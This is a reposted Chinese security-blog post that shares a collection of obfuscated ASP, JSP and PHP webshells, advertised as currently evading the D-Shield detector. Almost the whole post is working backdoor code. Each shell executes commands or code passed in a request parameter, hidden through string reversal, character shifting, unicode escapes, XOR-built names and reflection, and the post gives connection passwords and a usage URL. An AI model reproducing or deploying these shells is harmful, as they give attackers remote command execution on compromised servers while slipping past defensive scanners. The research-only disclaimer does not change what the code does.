文章来源:极安中国
原作者:h88z
https://bbs.secgeeker.net/forum.php?mod=viewthread&tid=1637
逛论坛的时候发现大佬们好多优秀的文章
骚思路也是很多,都值得我们去参考学习
站在巨人的肩膀上学习!
0x01 ASP
ASP连接密码均为99999
<%dim a(5)a(0)=request("99999")eXecUTe(a(0))%>
<%Function b():b = request("99999")End FunctionFunction f():eXecUTe(b())End Functionf()%>
<%Class zzzprivate yyyPrivate Sub Class_Initializeyyy = ""End Subpublic property let www(yyy)execute(yyy)end propertyEnd ClassSet xxx= New zzzdim vvv(7)vvv(2)=request("99999")xxx.www= vvv(2)%>
<%Function x():x = request("99999")End Functiony = Mid(x(),1)z =y&""eXecUTe(z)%>
<%Function x():x = request("99999")End Functiony = Left(x(),99999)eXecUTe(y)%>
0x02 JSP
jsp连接密码均为x
<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString reverseStr(String str){String reverse = "";int length =str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) +reverse;}return reverse;}%><%String x =request.getParameter("x");if(x!=null){Class rt =Class.forName(reverseStr("emitnuR.gnal.avaj"));Method gr =rt.getMethod(reverseStr("emitnuRteg"));Method ex =rt.getMethod(reverseStr("cexe"), String.class);Process e = (Process)ex.invoke(gr.invoke(null), x);java.io.InputStream in =e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("");}%>
<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString plusStr(String str){String plus = "";int length =str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}elseif(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}else{plus=plus+z;}}returnplus;}%><%String x =request.getParameter("x");if(x!=null){Class rt =Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));Method gr =rt.getMethod(plusStr("dbqRrkqfjb"));Method ex =rt.getMethod(plusStr("bubz"), String.class);Process e = (Process)ex.invoke(gr.invoke(null),x);java.io.InputStream in =e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("");}%>
<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString eStr(String str){String result = "";int length =str.length();for (int i = 0; i < length; i++){charz=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%><%if(request.getParameter("x")!=null){Classrt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));Process e =(Process) rt.getMethod(new String(eStr("j}jh")),String.class).invoke(rt.getMethod(newString(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}),request.getParameter("x") );java.io.InputStreamin = e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("");while((a=in.read(b))!=-1){out.println(newString(b));}out.print("");}%>
<%@ pagelanguage="java" import="java.util.*,java.io.*"pageEncoding="UTF-8"%><%!u0070u0075u0062u006cu0069u0063u0020u0073u0074u0061u0074u0069u0063u0020u0053u0074u0072u0069u006eu0067u0020u0065u0078u0063u0075u0074u0065u0043u006du0064u0028u0053u0074u0072u0069u006eu0067u0020u0063u0029u0020u007bu0053u0074u0072u0069u006eu0067u0042u0075u0069u006cu0064u0065u0072u0020u006cu0069u006eu0065u0020u003du0020u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u0042u0075u0069u006cu0064u0065u0072u0028u0029u003bu0074u0072u0079u0020u007bu0050u0072u006fu0063u0065u0073u0073u0020u0070u0072u006fu0020u003du0020u0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u0063u0029u003bu0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0075u0066u0020u003du0020u006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u0070u0072u006fu002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u0029u0029u003bu0053u0074u0072u0069u006eu0067u0020u0074u0065u006du0070u0020u003du0020u006eu0075u006cu006cu003bu0077u0068u0069u006cu0065u0020u0028u0028u0074u0065u006du0070u0020u003du0020u0062u0075u0066u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0020u0021u003du0020u006eu0075u006cu006cu0029u0020u007bu006cu0069u006eu0065u002eu0061u0070u0070u0065u006eu0064u0028u0074u0065u006du0070u002bu0022u005cu006eu0022u0029u003bu007du0062u0075u0066u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0020u0063u0061u0074u0063u0068u0020u0028u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u0020u007bu006cu0069u006eu0065u002eu0061u0070u0070u0065u006eu0064u0028u0065u002eu0067u0065u0074u004du0065u0073u0073u0061u0067u0065u0028u0029u0029u003bu007du0072u0065u0074u0075u0072u006eu0020u006cu0069u006eu0065u002eu0074u006fu0053u0074u0072u0069u006eu0067u0028u0029u003bu007d%><%u0069u0066u0028u0022u0039u0035u0032u0037u0037u0022u002eu0065u0071u0075u0061u006cu0073u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0070u0065u0063u0069u0077u0069u0064u0022u0029u0029u0026u0026u0021u0022u0022u002eu0065u0071u0075u0061u006cu0073u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0070u0065u0063u0069u0077u0069u0064u0022u0029u0029u0029u007bu006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u003cu0070u0072u0065u003eu0022u002bu0065u0078u0063u0075u0074u0065u0043u006du0064u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u0066u0074u006du0069u0064u0022u0029u0029u002bu0022u003cu002fu0070u0072u0065u003eu0022u0029u003bu007du0065u006cu0073u0065u007bu006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u003au002du0029u0022u0029u003bu007d%>
使用方法:
?peciwid=95277&cftmid=id
0x03 PHP
php连接密码均为1
<?php$a=end($_REQUEST);eval($a);?>
<?php$a =substr_replace("asse00","rt",4);$b=array($array=array(''=>$a($_GET['1'])));var_dump($b);?>
<?php/*** assert($_GET[1+0]);*/class User { }$user = new ReflectionClass('User');$comment = $user->getDocComment();$d = substr($comment , 14 , 20);assert($d);?>
<?php' v. N&N- O& ]; v9 N! m9 y: {; J$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');// $_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');// $__='_POST';$___=$$__;$_($___[pwd]); //assert($_POST[_]);?>
0x04 分享来源
https://bbs.secgeeker.net/forum.php?mod=viewthread&tid=1637【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
一如既往的学习,一如既往的整理,一如即往的分享。
“如侵权请私聊公众号删文”
本文始发于微信公众号(渗透Xiao白帽):分享一批asp、jsp、php小马,当前时间都可过d盾
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论